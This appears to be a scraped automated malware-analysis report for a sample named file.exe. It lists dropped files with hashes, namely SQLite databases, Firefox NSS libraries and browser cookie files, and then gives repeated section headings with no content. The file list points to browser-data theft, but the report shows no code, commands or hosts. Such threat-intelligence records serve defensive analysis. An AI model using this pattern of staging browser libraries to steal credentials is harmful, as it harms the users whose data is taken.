C:\ProgramData\GCBKECAKFBGCAKECGIEHDGHCBA	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\HJDBAFIECGHCBFIDGDAA	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\HJJECBKKECFIEBGCAKJK	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by